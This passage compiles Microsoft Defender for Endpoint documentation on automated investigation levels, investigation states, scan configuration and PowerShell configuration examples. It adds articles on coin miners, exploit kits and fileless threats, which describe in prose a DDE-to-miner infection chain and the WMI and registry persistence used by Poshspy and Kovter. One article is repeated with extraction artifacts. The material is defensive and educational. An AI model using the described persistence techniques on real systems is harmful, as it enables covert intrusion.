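    '*\program files\*',                         # printed without a trailing wildcard in the table; subtree assumed
    '*\program files (x86)\*',
    '*\documents and settings\*\users\*'
)

function Test-PathMatchesAny {
    param([string]$Path, [string[]]$Patterns)
    # -like is case-insensitive and its '*' spans backslashes, which is what the table's globs imply.
    foreach ($pattern in $Patterns) {
        if ($Path -like $pattern) { return $true }
    }
    return $false
}

function Get-AirRemediationOutcome {
    param(
        [Parameter(Mandatory)] [string] $FilePath,
        [Parameter(Mandatory)]
        [ValidateSet('Full', 'SemiAllFolders', 'SemiCoreFolders', 'SemiNonTempFolders', 'None')]
        [string] $AutomationLevel
    )
    $inCore = Test-PathMatchesAny -Path $FilePath -Patterns $CoreFolderPatterns
    $inTemp = Test-PathMatchesAny -Path $FilePath -Patterns $TempFolderPatterns

    switch ($AutomationLevel) {
        'Full'               { 'Automatic' }                    # lands on the History tab; can be undone
        'SemiAllFolders'     { 'PendingApproval' }              # Pending tab; times out (= rejected) after 7 days
        'SemiCoreFolders'    { if ($inCore) { 'PendingApproval' } else { 'Automatic' } }
        'SemiNonTempFolders' { if ($inTemp) { 'Automatic' } else { 'PendingApproval' } }
        'None'               { 'NoInvestigation' }              # AIR does not run at all
    }
}

# Constructed sample paths (not from the article) chosen to show where the levels differ.
$samples = @(
    'C:\Users\alice\AppData\Local\Temp\dropper.exe',
    'C:\Windows\Temp\stage2.exe',
    'C:\Windows\System32\evil.dll',
    'C:\ProgramData\vendor\agent.exe'
)
foreach ($path in $samples) {
    foreach ($level in 'Full', 'SemiAllFolders', 'SemiCoreFolders', 'SemiNonTempFolders') {
        '{0,-19} {1,-48} {2}' -f $level, $path, (Get-AirRemediationOutcome -FilePath $path -AutomationLevel $level)
    }
}
```

Two of the sample paths are the instructive ones. C:\Windows\Temp\ matches both the core pattern and a temp pattern, so the same file waits for approval under the core-folders level but is remediated automatically under the non-temp-folders level. C:\ProgramData\ matches neither list, so the two semi-automation levels give opposite answers for it as well. When choosing a level for a device group, run the paths you care about through this function and check that the result is what your approval process expects.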

Important points about automation levels

Full automation has proven to be reliable, efficient, and safe, and is recommended for all customers. Full automation frees up your critical security resources so they can focus more on your strategic initiatives.

New tenants (which include tenants that were created on or after August 16, 2020)
with Defender for Endpoint are set to full automation by default.

Defender for Business uses full automation by default. Defender for Business
doesn't use device groups the same way as Defender for Endpoint. Thus, full
automation is turned on and applied to all devices in Defender for Business.

If your security team has defined device groups with a level of automation, those
settings aren't changed by the new default settings that are rolling out.

You can keep your default automation settings, or change them according to your
organizational needs. To change your settings, set your level of automation.

Note

Defender for Business depends on real-time protection for automatic investigation. Real-time protection must be enabled and in active mode to enable automatic investigation.

Next steps
Configure automated investigation and remediation capabilities in Defender for Endpoint
Visit the Action Center

Tip

Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: Microsoft Defender for Endpoint Tech Community.

Configure automated investigation and
remediation capabilities in Microsoft
Defender for Endpoint
Article • 02/16/2024

Applies to:

Microsoft Defender XDR
Microsoft Defender for Endpoint Plan 2

If your organization is using Defender for Endpoint (or Defender for Business), automated investigation and remediation capabilities can save your security operations team time and effort. As outlined in this blog post, these capabilities mimic the ideal steps that a security analyst takes to investigate and remediate threats. Learn more about automated investigation and remediation.

If you're using Defender for Endpoint, you can specify an automation level so that when
a threat is detected on a device, the entity can be remediated automatically or only
upon approval by your security team. You can configure automated investigation and
remediation with device groups.

Note

In Defender for Business, automated investigation is configured automatically. See advanced features.

Set up device groups

1. In the Microsoft Defender portal (https://security.microsoft.com), on the Settings page, under Permissions, select Device groups.

2. Select + Add device group.

3. Create at least one device group, as follows:

Specify a name and description for the device group.
In the Automation level list, select a level, such as Full - remediate threats automatically. The automation level determines whether remediation actions are taken automatically, or only upon approval. To learn more, see Automation levels in automated investigation and remediation.
In the Members section, use one or more conditions to identify and include devices.

4. Select Done when you're finished setting up your device group.

Note

The Automated Investigation option has been removed from the advanced
features setting in Defender for Endpoint. Automated investigation is now enabled
by default.

Next steps
Visit the Action Center to view pending and completed remediation actions
Review and approve pending actions

See also
Address false positives/negatives in Microsoft Defender for Endpoint
Automation levels in automated investigation and remediation

Tip

Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: Microsoft Defender for Endpoint Tech Community.

View the details and results of an
automated investigation
Article • 02/21/2024

Applies to:

Microsoft Defender for Endpoint Plan 2

With Microsoft Defender for Endpoint, when an automated investigation runs, details
about that investigation are available both during and after the automated investigation
process. If you have the necessary permissions, you can view those details in an
investigation details view. The investigation details view provides you with up-to-date
status and the ability to approve any pending actions.

(NEW!) Unified investigation page

The investigation page has recently been updated to include information across your devices, email, and collaboration content. The new, unified investigation page defines a common language and provides a unified experience for automatic investigations across Microsoft Defender for Endpoint and Microsoft Defender for Office 365.

Tip

To learn more about what's changing, see (NEW!) Unified investigation page.

Open the investigation details view

You can open the investigation details view by using one of the following methods:

Select an item in the Action center
Select an investigation from an incident details page

Select an item in the Action center

The improved Action center brings together remediation actions across your devices, email & collaboration content, and identities. Listed actions include remediation actions that were taken automatically or manually. In the Action center, you can view actions that are awaiting approval and actions that were already approved or completed. You can also navigate to more details, such as an investigation page.

1. Go to Microsoft Defender XDR and sign in.
2. In the navigation pane, choose Action center.
3. On either the Pending or History tab, select an item. Its flyout pane opens.
4. Review the information in the flyout pane, and then take one of the following
steps:

Select Open investigation page to view more details about the investigation.
Select Approve to initiate a pending action.
Select Reject to prevent a pending action from being taken.
Select Go hunt to go into Advanced hunting.

Open an investigation from an incident details page

Use an incident details page to view detailed information about an incident, including the alerts that were triggered and information about any affected devices, user accounts, or mailboxes.

1. Go to Microsoft Defender XDR and sign in.
2. In the navigation pane, choose Incidents & alerts > Incidents.
3. Select an item in the list, and then choose Open incident page.
4. Select the Investigations tab, and then select an investigation in the list. Its flyout pane opens.
5. Select Open investigation page.

Investigation details
Use the investigation details view to see past, current, and pending activity pertaining to
an investigation. The investigation details view resembles the following image:

In the Investigation details view, you can see information on the Investigation graph,
Alerts, Devices, Identities, Key findings, Entities, Log, and Pending actions tabs,
described in the following table.

Note

The specific tabs you see in an investigation details page depend on what your subscription includes. For example, if your subscription does not include Microsoft Defender for Office 365 Plan 2, you won't see a Mailboxes tab.

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

Investigation graph: Provides a visual representation of the investigation. Depicts entities and lists threats found, along with alerts and whether any actions are awaiting approval. You can select an item on the graph to view more details. For example, selecting the Evidence icon takes you to the Evidence tab, where you can see detected entities and their verdicts.

Alerts: Lists alerts associated with the investigation. Alerts can come from threat protection features on a user's device, in Office apps, Defender for Cloud Apps, and other Microsoft Defender XDR features.

Devices: Lists devices included in the investigation along with their remediation level. (Remediation levels correspond to the automation level for device groups.)

Mailboxes: Lists mailboxes that are impacted by detected threats.

Users: Lists user accounts that are impacted by detected threats.

Evidence: Lists pieces of evidence raised by alerts/investigations. Includes verdicts (Malicious, Suspicious, or No threats found) and remediation status.

Entities: Provides details about each analyzed entity, including a verdict for each entity type (Malicious, Suspicious, or No threats found).

Log: Provides a chronological, detailed view of all the investigation actions taken after an alert was triggered.

Pending actions: Lists items that require approval to proceed. Go to the Action center (https://security.microsoft.com/action-center) to approve pending actions.

Investigation states

The following table lists investigation states and what they indicate.

Benign: Artifacts were investigated and a determination was made that no threats were found.

PendingResource: An automated investigation is paused because either a remediation action is pending approval, or the device on which an artifact was found is temporarily unavailable.

UnsupportedAlertType: An automated investigation is not available for this type of alert. Further investigation can be done manually, by using advanced hunting.

Failed: At least one investigation analyzer ran into a problem where it couldn't complete the investigation. If an investigation fails after remediation actions were approved, the remediation actions might still have succeeded.

SuccessfullyRemediated: An automated investigation completed, and all remediation actions were completed or approved.

To provide more context about how investigation states show up, the following table lists alerts and their corresponding automated investigation state. This table is included as an example of what a security operations team might see in the Microsoft Defender portal.

Alert name | Severity | Investigation state | Status | Category
Malware was detected in a wim disk image file | Informational | Benign | Resolved | Malware
Malware was detected in a rar archive file | Informational | PendingResource | New | Malware
Malware was detected in a rar archive file | Informational | UnsupportedAlertType | New | Malware
Malware was detected in a rar archive file | Informational | UnsupportedAlertType | New | Malware
Malware was detected in a rar archive file | Informational | UnsupportedAlertType | New | Malware
Malware was detected in a zip archive file | Informational | PendingResource | New | Malware
Malware was detected in a zip archive file | Informational | PendingResource | New | Malware
Malware was detected in a zip archive file | Informational | PendingResource | New | Malware
Malware was detected in a zip archive file | Informational | PendingResource | New | Malware
Wpakill hacktool was prevented | Low | Failed | New | Malware
GendowsBatch hacktool was prevented | Low | Failed | New | Malware
Keygen hacktool was prevented | Low | Failed | New | Malware
Malware was detected in a zip archive file | Informational | PendingResource | New | Malware
Malware was detected in a rar archive file | Informational | PendingResource | New | Malware
Malware was detected in a rar archive file | Informational | PendingResource | New | Malware
Malware was detected in a zip archive file | Informational | PendingResource | New | Malware
Malware was detected in a rar archive file | Informational | PendingResource | New | Malware
Malware was detected in a rar archive file | Informational | PendingResource | New | Malware
Malware was detected in an iso disc image file | Informational | PendingResource | New | Malware
Malware was detected in an iso disc image file | Informational | PendingResource | New | Malware
Malware was detected in a pst outlook data file | Informational | UnsupportedAlertType | New | Malware
Malware was detected in a pst outlook data file | Informational | UnsupportedAlertType | New | Malware
MediaGet detected | Medium | PartiallyInvestigated | New | Malware
TrojanEmailFile | Medium | SuccessfullyRemediated | Resolved | Malware
CustomEnterpriseBlock malware was prevented | Informational | SuccessfullyRemediated | Resolved | Malware
An active CustomEnterpriseBlock malware was blocked | Low | SuccessfullyRemediated | Resolved | Malware
An active CustomEnterpriseBlock malware was blocked | Low | SuccessfullyRemediated | Resolved | Malware
An active CustomEnterpriseBlock malware was blocked | Low | SuccessfullyRemediated | Resolved | Malware
TrojanEmailFile | Medium | Benign | Resolved | Malware
CustomEnterpriseBlock malware was prevented | Informational | UnsupportedAlertType | New | Malware
CustomEnterpriseBlock malware was prevented | Informational | SuccessfullyRemediated | Resolved | Malware
TrojanEmailFile | Medium | SuccessfullyRemediated | Resolved | Malware
TrojanEmailFile | Medium | Benign | Resolved | Malware
An active CustomEnterpriseBlock malware was blocked | Low | PendingResource | New | Malware

See also
Review remediation actions following an automated investigation
View and organize the Microsoft Defender for Endpoint Incidents queue

Tip

Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: Microsoft Defender for Endpoint Tech Community.

Feedback
Was this page helpful?  Yes  No

Provide product feedback


View the details and results of an
automated investigation
Article • 02/21/2024

Applies to:

Microsoft Defender for Endpoint Plan 2

With Microsoft Defender for Endpoint, when an automated investigation runs, details
about that investigation are available both during and after the automated investigation
process. If you have the necessary permissions, you can view those details in an
investigation details view. The investigation details view provides you with up-to-date
status and the ability to approve any pending actions.

(NEW!) Unified investigation page


The investigation page has recently been updated to include information across your
devices, email, and collaboration content. The new, unified investigation page defines a
common language and provides a unified experience for automatic investigations across
Microsoft Defender for Endpoint and Microsoft Defender for Office 365.

 Tip

To learn more about what's changing, see (NEW!) Unified investigation page.

Open the investigation details view


You can open the investigation details view by using one of the following methods:

Select an item in the Action center


Select an investigation from an incident details page

Select an item in the Action center


The improved Action center brings together remediation actions across your devices,
email & collaboration content, and identities. Listed actions include remediation actions
that were taken automatically or manually. In the Action center, you can view actions
that are awaiting approval and actions that were already approved or completed. You
can also navigate to more details, such as an investigation page.
1. Go to Microsoft Defender XDR and sign in.
2. In the navigation pane, choose Action center.
3. On either the Pending or History tab, select an item. Its flyout pane opens.
4. Review the information in the flyout pane, and then take one of the following
steps:

Select Open investigation page to view more details about the investigation.
Select Approve to initiate a pending action.
Select Reject to prevent a pending action from being taken.
Select Go hunt to go into Advanced hunting.

Open an investigation from an incident details page


Use an incident details page to view detailed information about an incident, including
alerts that were triggered information about any affected devices, user accounts, or
mailboxes.

1. Go to Microsoft Defender XDR and sign in.


2. In the navigation pane, choose Incidents & alerts > Incidents.
3. Select an item in the list, and then choose Open incident page.
4. Select the Investigations tab, and then select an investigation in the list. Its flyout
pane opens.
5. Select Open investigation page.

Investigation details
Use the investigation details view to see past, current, and pending activity pertaining to
an investigation. The investigation details view resembles the following image:

In the Investigation details view, you can see information on the Investigation graph,
Alerts, Devices, Identities, Key findings, Entities, Log, and Pending actions tabs,
described in the following table.

7 Note

The specific tabs you see in an investigation details page depends on what
your subscription includes. For example, if your subscription does not include
Microsoft Defender for Office 365 Plan 2, you won't see a Mailboxes tab.
Device group creation is supported in Defender for Endpoint Plan 1 and Plan
2.

ノ Expand table

Tab Description

Investigation Provides a visual representation of the investigation. Depicts entities and lists
graph threats found, along with alerts and whether any actions are awaiting approval.
You can select an item on the graph to view more details. For example, selecting
the Evidence icon takes you to the Evidence tab, where you can see detected
entities and their verdicts.

Alerts Lists alerts associated with the investigation. Alerts can come from threat
protection features on a user's device, in Office apps, Defender for Cloud Apps,
and other Microsoft Defender XDR features.

Devices Lists devices included in the investigation along with their remediation level.
(Remediation levels correspond to the automation level for device groups.)

Mailboxes Lists mailboxes that are impacted by detected threats.

Users Lists user accounts that are impacted by detected threats.

Evidence Lists pieces of evidence raised by alerts/investigations. Includes verdicts


(Malicious, Suspicious, or No threats found) and remediation status.

Entities Provides details about each analyzed entity, including a verdict for each entity
type (Malicious, Suspicious, or No threats found).

Log Provides a chronological, detailed view of all the investigation actions taken
after an alert was triggered.

Pending Lists items that require approval to proceed. Go to the Action center
actions (https://security.microsoft.com/action-center ) to approve pending actions.

Investigation states
The following table lists investigation states and what they indicate.

ノ Expand table

Investigation state Definition

Benign Artifacts were investigated and a determination was made that no


threats were found.
Investigation state Definition

PendingResource An automated investigation is paused because either a remediation


action is pending approval, or the device on which an artifact was found
is temporarily unavailable.

UnsupportedAlertType An automated investigation is not available for this type of alert. Further
investigation can be done manually, by using advanced hunting.

Failed At least one investigation analyzer ran into a problem where it couldn't
complete the investigation. If an investigation fails after remediation
actions were approved, the remediation actions might still have
succeeded.

Successfully An automated investigation completed, and all remediation actions


remediated were completed or approved.

To provide more context about how investigation states show up, the following table
lists alerts and their corresponding automated investigation state. This table is included
as an example of what a security operations team might see in the Microsoft Defender
portal.

ノ Expand table

Alert name Severity Investigation state Status Category

Malware was detected in a wim Informational Benign Resolved Malware


disk image file

Malware was detected in a rar Informational PendingResource New Malware


archive file

Malware was detected in a rar Informational UnsupportedAlertType New Malware


archive file

Malware was detected in a rar Informational UnsupportedAlertType New Malware


archive file

Malware was detected in a rar Informational UnsupportedAlertType New Malware


archive file

Malware was detected in a zip Informational PendingResource New Malware


archive file

Malware was detected in a zip Informational PendingResource New Malware


archive file

Malware was detected in a zip Informational PendingResource New Malware


archive file
Alert name Severity Investigation state Status Category

Malware was detected in a zip Informational PendingResource New Malware


archive file

Wpakill hacktool was prevented Low Failed New Malware
Alert name | Severity | Investigation state | Status | Category
GendowsBatch hacktool was prevented | Low | Failed | New | Malware
Keygen hacktool was prevented | Low | Failed | New | Malware
Malware was detected in a zip archive file | Informational | PendingResource | New | Malware
Malware was detected in a rar archive file | Informational | PendingResource | New | Malware
Malware was detected in a rar archive file | Informational | PendingResource | New | Malware
Malware was detected in a zip archive file | Informational | PendingResource | New | Malware
Malware was detected in a rar archive file | Informational | PendingResource | New | Malware
Malware was detected in a rar archive file | Informational | PendingResource | New | Malware
Malware was detected in an iso disc image file | Informational | PendingResource | New | Malware
Malware was detected in an iso disc image file | Informational | PendingResource | New | Malware
Malware was detected in a pst outlook data file | Informational | UnsupportedAlertType | New | Malware
Malware was detected in a pst outlook data file | Informational | UnsupportedAlertType | New | Malware
MediaGet detected | Medium | PartiallyInvestigated | New | Malware
TrojanEmailFile | Medium | SuccessfullyRemediated | Resolved | Malware
CustomEnterpriseBlock malware was prevented | Informational | SuccessfullyRemediated | Resolved | Malware
An active CustomEnterpriseBlock malware was blocked | Low | SuccessfullyRemediated | Resolved | Malware
An active CustomEnterpriseBlock malware was blocked | Low | SuccessfullyRemediated | Resolved | Malware
An active CustomEnterpriseBlock malware was blocked | Low | SuccessfullyRemediated | Resolved | Malware
TrojanEmailFile | Medium | Benign | Resolved | Malware
CustomEnterpriseBlock malware was prevented | Informational | UnsupportedAlertType | New | Malware
CustomEnterpriseBlock malware was prevented | Informational | SuccessfullyRemediated | Resolved | Malware
TrojanEmailFile | Medium | SuccessfullyRemediated | Resolved | Malware
TrojanEmailFile | Medium | Benign | Resolved | Malware
An active CustomEnterpriseBlock malware was blocked | Low | PendingResource | New | Malware


See also
Review remediation actions following an automated investigation
View and organize the Microsoft Defender for Endpoint Incidents queue

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .


Customize, initiate, and review the
results of Microsoft Defender Antivirus
scans and remediation
Article • 02/27/2024

Applies to:

Microsoft Defender XDR


Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business
Microsoft Defender for Endpoint Plan 1
Microsoft Defender Antivirus

You can use Group Policy, PowerShell, and Windows Management Instrumentation
(WMI) to configure Microsoft Defender Antivirus scans.


Article | Description
Configure and validate file, folder, and process-opened file exclusions in Microsoft Defender Antivirus scans | You can exclude files (including files modified by specified processes) and folders from on-demand scans, scheduled scans, and always-on real-time protection monitoring and scanning
Configure Microsoft Defender Antivirus scanning options | You can configure Microsoft Defender Antivirus to include certain types of email storage files, back-up or reparse points, and archived files (such as .zip files) in scans. You can also enable network file scanning
Configure remediation for scans | Configure what Microsoft Defender Antivirus should do when it detects a threat, and how long quarantined files should be retained in the quarantine folder
Configure scheduled scans | Set up recurring (scheduled) scans, including when they should run and whether they run as full or quick scans
Configure and run scans | Run and configure on-demand scans using PowerShell, Windows Management Instrumentation, or individually on endpoints with the Windows Security app
Review scan results | Review the results of scans using Microsoft Endpoint Configuration Manager, Microsoft Intune, or the Windows Security app
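
The PowerShell route through the options in the table above (scanning options, remediation retention, a scheduled scan, exclusions, an on-demand scan, and reviewing results), as an added example that is not code from the Microsoft article. It assumes an elevated session on a Windows device with the Defender module; the schedule values and the exclusion paths are illustrative choices, not recommended defaults.

```powershell
# Added example, not code from the Microsoft article: configure, run, and review
# Microsoft Defender Antivirus scans with the Defender PowerShell module.
# Assumes an elevated session on a Windows device; the schedule values and the
# exclusion paths below are illustrative choices, not recommended defaults.
#Requires -RunAsAdministrator
Import-Module Defender

function Set-ScanBaseline {
    # Scanning options: include archives (.zip, .rar), email storage files (.pst)
    # and files on network shares in scans.
    Set-MpPreference -DisableArchiveScanning $false
    Set-MpPreference -DisableEmailScanning $false
    Set-MpPreference -DisableScanningNetworkFiles $false

    # Remediation: purge quarantined items after 30 days (0 keeps them indefinitely).
    Set-MpPreference -QuarantinePurgeItemsAfterDelay 30

    # Scheduled scan: a quick scan every day at 02:00, capped at 30% average CPU.
    Set-MpPreference -ScanParameters QuickScan
    Set-MpPreference -ScanScheduleDay Everyday
    Set-MpPreference -ScanScheduleTime ([datetime]'02:00:00')
    Set-MpPreference -ScanAvgCPULoadFactor 30

    # Exclusions are a blind spot for the engine, so scope them tightly and document
    # them. Both paths are hypothetical.
    Add-MpPreference -ExclusionPath 'D:\BuildCache'
    Add-MpPreference -ExclusionProcess 'C:\Program Files\Contoso\build.exe'
}

function Invoke-OnDemandScan {
    # On-demand scan: a quick scan by default, or a custom scan of one path.
    param([string]$Path)
    if ($Path) { Start-MpScan -ScanType CustomScan -ScanPath $Path }
    else       { Start-MpScan -ScanType QuickScan }
}

function Get-ScanReview {
    # Review results: last scan times and signature age from the engine status,
    # plus every detection the engine has recorded. The same data is exposed
    # through WMI as MSFT_MpComputerStatus and MSFT_MpThreatDetection in
    # root\Microsoft\Windows\Defender.
    $status = Get-MpComputerStatus
    [pscustomobject]@{
        LastQuickScan = $status.QuickScanEndTime
        LastFullScan  = $status.FullScanEndTime
        SignatureAge  = $status.AntivirusSignatureAge
        Detections    = @(Get-MpThreatDetection |
                          Select-Object ThreatID, InitialDetectionTime, ActionSuccess, Resources)
    }
}

Set-ScanBaseline
Invoke-OnDemandScan -Path 'C:\Users\Public\Downloads'   # hypothetical path
Get-ScanReview | Format-List
```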


Endpoint Attack Notifications
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 2


Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

This covers threat hunting on your Microsoft Defender for Endpoint service.
However, if you're interested to explore the service beyond your current license,
and proactively hunt threats not just on endpoints but also across Office 365, cloud
applications, and identity, refer to Microsoft Defender Experts for Hunting.

Note

Customers who signed up for Experts on Demand prior to sunset will have access
to Ask Defender Experts until the expiration of their current contract.

Endpoint Attack Notifications (previously referred to as Microsoft Threat Experts -
Targeted Attack Notification) provides proactive hunting for the most important threats
to your network, including human adversary intrusions, hands-on-keyboard attacks, or
advanced attacks like cyber-espionage. These notifications show up as a new alert. The
managed hunting service includes:

Threat monitoring and analysis, reducing dwell time and risk to the business
Hunter-trained artificial intelligence to discover and prioritize both known and
unknown attacks
Identifying the most important risks, helping SOCs maximize time and energy
Scope of compromise and as much context as can be quickly delivered to enable
fast SOC response
Apply for Endpoint Attack Notifications

If you're a Microsoft Defender for Endpoint customer, you can apply for Endpoint Attack
Notifications. Go to Settings > Endpoints > General > Advanced features > Endpoint
Attack Notifications to apply. Once accepted, you'll get the benefits of Endpoint Attack
Notifications.

Receive Endpoint Attack notifications

Endpoint Attack Notifications are alerts that have been hand crafted by Microsoft's
managed hunting service based on suspicious activity in your environment. They can be
viewed through several mediums:

The alerts queue in the Microsoft Defender portal
Using the API
DeviceAlertEvents table in Advanced hunting
Your email if you configure an email notifications rule

Endpoint Attack Notifications can be identified by:

A tag named Endpoint Attack Notification
A service source of Microsoft Defender for Endpoint > Microsoft Defender Experts

Note

If you have enrolled for Endpoint Attack Notifications but are not seeing any alerts
from the service, it indicates that you have a strong security posture and are less
prone to attacks.

Create an email notification rule

You can create rules to send email notifications to notification recipients. For details on
creating, editing, deleting, or troubleshooting email notifications, see Configure alert
notifications.

Next steps
To proactively hunt threats across endpoints, Office 365, cloud applications, and
identity, refer to Microsoft Defender Experts for Hunting.



Coin miners
Article • 02/28/2024

Cybercriminals are always looking for new ways to make money. With the rise of digital
currencies, also known as cryptocurrencies, criminals see a unique opportunity to
infiltrate an organization and secretly mine for coins by reconfiguring malware.

How coin miners work

Many infections start with:

Email messages with attachments that try to install malware.

Websites hosting exploit kits that attempt to use vulnerabilities in web browsers
and other software to install coin miners.

Websites taking advantage of computer processing power by running scripts while
users browse the website.

Mining is the process of running complex mathematical calculations necessary to
maintain the blockchain ledger. This process generates coins but requires significant
computing resources.

Coin miners aren't inherently malicious. Some individuals and organizations invest in
hardware and electric power for legitimate coin mining operations. However, others
look for alternative sources of computing power and try to find their way into corporate
networks. These coin miners aren't wanted in enterprise environments because they eat
up precious computing resources.

Cybercriminals see an opportunity to make money by running malware campaigns that
distribute, install, and run trojanized miners at the expense of other people's computing
resources.

Examples

DDE exploits, which have been known to distribute ransomware, are now delivering
miners.

For example, a sample of the malware detected as Trojan:Win32/Coinminer (SHA-256:
7213cbbb1a634d780f9bb861418eb262f58954e6e5dca09ca50c1e1324451293) is
installed by Exploit:O97M/DDEDownloader.PA, a Word document that contains the DDE
exploit. The exploit launches a cmdlet that executes a malicious PowerShell script
(Trojan:PowerShell/Maponeir.A). It downloads the trojanized miner, a modified version
of the miner XMRig, which then mines Monero cryptocurrency.

How to protect against coin miners

Enable potentially unwanted applications (PUA) detection. Some coin mining tools
aren't considered malware but are detected as PUA. Many applications detected as PUA
can negatively impact machine performance and employee productivity. In enterprise
environments, you can stop adware, torrent downloaders, and coin mining by enabling
PUA detection.

Since coin miners are becoming a popular payload in many different kinds of attacks,
see general tips on how to prevent malware infection.

For more information on coin miners, see the blog post Invisible resource thieves: The
increasing threat of cryptocurrency miners .
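
Turning on PUA detection as the article recommends, staged through audit mode so the impact on legitimate tools can be measured first, as an added example that is not code from the Microsoft article. It assumes an elevated PowerShell session with the Defender module.

```powershell
# Added example, not code from the Microsoft article: enable PUA protection in
# audit mode first, review what it flags, then switch to block mode.
# Assumes an elevated PowerShell session with the Defender module.
#Requires -RunAsAdministrator

function Set-PuaProtection {
    # PUAProtection: 0 = Disabled, 1 = Enabled (block), 2 = AuditMode (log only).
    # Audit mode shows which tools would be blocked before any user is affected.
    param([ValidateSet('Disabled', 'Enabled', 'AuditMode')][string]$Mode)
    $before = (Get-MpPreference).PUAProtection
    Set-MpPreference -PUAProtection $Mode
    [pscustomobject]@{ Before = $before; After = (Get-MpPreference).PUAProtection }
}

function Get-PuaDetections {
    # PUA detections carry the "PUA:" prefix in the threat name, so coin-mining
    # tools classified as PUA rather than malware are listed here.
    Get-MpThreat | Where-Object ThreatName -like 'PUA:*' |
        Select-Object ThreatName, SeverityID,
                      @{ n = 'Resources'; e = { $_.Resources -join '; ' } }
}

Set-PuaProtection -Mode AuditMode    # stage 1: observe only
Get-PuaDetections                    # triage what would have been blocked
Set-PuaProtection -Mode Enabled      # stage 2: block
```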



Exploits and exploit kits
Article • 02/28/2024

Exploits take advantage of vulnerabilities in software. A vulnerability is like a hole in your
software that malware can use to get onto your device. Malware exploits these
vulnerabilities to bypass your computer's security safeguards to infect your device.

How exploits and exploit kits work

Exploits are often the first part of a larger attack. Hackers scan for outdated systems that
contain critical vulnerabilities, which they then exploit by deploying targeted malware.
Exploits often include shellcode, which is a small malware payload used to download
additional malware from attacker-controlled networks. Shellcode allows hackers to
infect devices and infiltrate organizations.

Exploit kits are more comprehensive tools that contain a collection of exploits. These kits
scan devices for different kinds of software vulnerabilities and, if any are detected,
deploy additional malware to further infect a device. Kits can use exploits targeting
various software, including Adobe Flash Player, Adobe Reader, Internet Explorer, Oracle
Java, and Sun Java.

The most common method used by attackers to distribute exploits and exploit kits is
through webpages, but exploits can also arrive in emails. Some websites unknowingly
and unwillingly host malicious code and exploits in their ads.

The infographic below shows how an exploit kit might attempt to exploit a device after
you visit a compromised webpage.

Figure 1. Example of how exploit kits work

Several notable threats, including Wannacry, exploit the Server Message Block (SMB)
vulnerability CVE-2017-0144 to launch malware.

Examples of exploit kits:

Angler / Axpergle

Neutrino

Nuclear

To learn more about exploits, read this blog post on taking apart a double zero-day
sample discovered in joint hunt with ESET.

How we name exploits

We categorize exploits in our Malware encyclopedia by the "platform" they target. For
example, Exploit:Java/CVE-2013-1489.A is an exploit that targets a vulnerability in Java.

A project called "Common Vulnerabilities and Exposures (CVE)" is used by many security
software vendors. The project gives each vulnerability a unique number, for example,
CVE-2016-0778. The portion "2016" refers to the year the vulnerability was discovered.
The "0778" is a unique ID for this specific vulnerability.

You can read more on the CVE website .

How to protect against exploits

The best prevention for exploits is to keep your organization's software up to date .
Software vendors provide updates for many known vulnerabilities, so make sure these
updates are applied to all devices.

For more general tips, see prevent malware infection.



Fileless threats
Article • 02/28/2024

What exactly are fileless threats? The term "fileless" suggests that a threat doesn't come
in a file, such as a backdoor that lives only in the memory of a machine. However, there's
no one definition for fileless malware. The term is used broadly, and sometimes to
describe malware families that do rely on files to operate.

Attacks involve several stages for functionalities like execution, persistence, or
information theft. Some parts of the attack chain may be fileless, while others may
involve the file system in some form.

For clarity, fileless threats are grouped into different categories.

Figure 1. Comprehensive diagram of fileless malware

Fileless threats can be classified by their entry point, which indicates how fileless
malware can arrive on a machine. They can arrive via an exploit, through compromised
hardware, or via regular execution of applications and scripts.

Next, list the form of entry point. For example, exploits can be based on files or network
data, PCI peripherals are a type of hardware vector, and scripts and executables are
subcategories of the execution vector.

Finally, classify the host of the infection. For example, a Flash application may contain a
variety of threats such as an exploit, a simple executable, and malicious firmware from a
hardware device.

Classifying helps you divide and categorize the various kinds of fileless threats. Some are
more dangerous but also more difficult to implement, while others are more commonly
used despite (or precisely because of) not being very advanced.

From this categorization, you can glean three main types of fileless threats based on
how much fingerprint they may leave on infected machines.

Type I: No file activity performed

A fully fileless malware can be considered one that never requires writing a file on the
disk. How would such malware infect a machine in the first place? One example is where
a target machine receives malicious network packets that exploit the EternalBlue
vulnerability. The vulnerability allows the installation of the DoublePulsar backdoor,
which ends up residing only in the kernel memory. In this case, there's no file or any
data written on a file.

A compromised device may also have malicious code hiding in device firmware (such as
a BIOS), a USB peripheral (like the BadUSB attack), or in the firmware of a network card.
All these examples don't require a file on the disk to run, and can theoretically live only
in memory. The malicious code would survive reboots, disk reformats, and OS reinstalls.

Infections of this type can be particularly difficult to detect because most antivirus
products don't have the capability to inspect firmware. In cases where a product does
have the ability to inspect and detect malicious firmware, there are still significant
challenges associated with remediation of threats at this level. This type of fileless
malware requires high levels of sophistication and often depends on particular hardware
or software configuration. It's not an attack vector that can be exploited easily and
reliably. While dangerous, threats of this type are uncommon and not practical for most
attacks.

Type II: Indirect file activity

There are other ways that malware can achieve fileless presence on a machine without
requiring significant engineering effort. Fileless malware of this type doesn't directly
write files on the file system, but they can end up using files indirectly. For example, with
the Poshspy backdoor attackers installed a malicious PowerShell command within the
WMI repository and configured a WMI filter to run the command periodically.

It's possible to carry out such installation via command line without requiring a
backdoor to already be on the file. The malware can be installed and theoretically run
without ever touching the file system. However, the WMI repository is stored on a
physical file in a central storage area managed by the CIM Object Manager, and usually
contains legitimate data. Even though the infection chain does technically use a physical
file, it's considered a fileless attack because the WMI repository is a multi-purpose data
container that can't be detected and removed.

Type III: Files required to operate

Some malware can have a sort of fileless persistence, but not without using files to
operate. An example for this scenario is Kovter, which creates a shell open verb handler
in the registry for a random file extension. Opening a file with such extension will lead to
the execution of a script through the legitimate tool mshta.exe.

Figure 2. Kovter's registry key

When the open verb is invoked, the associated command from the registry is launched,
which results in the execution of a small script. This script reads data from a further
registry key and executes it, in turn leading to the loading of the final payload. However,
to trigger the open verb in the first place, Kovter has to drop a file with the same
extension targeted by the verb (in the example above, the extension is .bbf5590fd). It
also has to set an autorun key configured to open such file when the machine starts.

Kovter is considered a fileless threat because the file system is of no practical use. The
